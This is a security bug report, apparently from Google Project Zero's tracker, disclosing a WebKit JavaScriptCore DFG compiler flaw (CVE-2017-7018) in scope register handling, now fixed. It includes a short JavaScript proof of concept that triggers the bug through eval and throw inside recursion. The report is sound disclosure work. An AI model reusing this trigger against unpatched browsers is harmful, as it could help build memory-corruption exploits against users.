Status: Fixed
Closed: Jul 24
WebKit: JSC: Incorrect scope register handling in DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry)
Project Member Reported by lokihardt@google.com, Apr 10 2017
Here's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).

void flush(InlineStackEntry* inlineStackEntry)
{
    ...
    if (m_graph.needsScopeRegister())
        flush(m_codeBlock->scopeRegister()); <<--- (a)
}

At (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase.

PoC:
function f() {
    // The inner function calls eval, so its code block needs a scope register.
    (function () {
        eval('1');
        // Recurse into f so it gets hot enough to be compiled by the DFG,
        // with this inner function as an inline stack entry.
        f();
    }());

    // op_throw makes the bytecode parser flush the inline stack, hitting
    // the flush(InlineStackEntry*) path shown above.
    throw 1;
}

f();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 
Project Member Comment 1 by lokihardt@google.com, Apr 10 2017
Project Member Comment 2 by lokihardt@google.com, Jun 28
Labels: Deadline-Grace
Project Member Comment 3 by lokihardt@google.com, Jul 13
Labels: CVE-2017-7018
Comment 4 Deleted
Project Member Comment 5 by lokihardt@google.com, Jul 24
My analysis was a little wrong. They fixed this just by inserting 6 characters: "flushDirect(m_codeBlock->scopeRegister());".
Project Member Comment 6 by lokihardt@google.com, Jul 24
Labels: -Restrict-View-Commit
Status: Fixed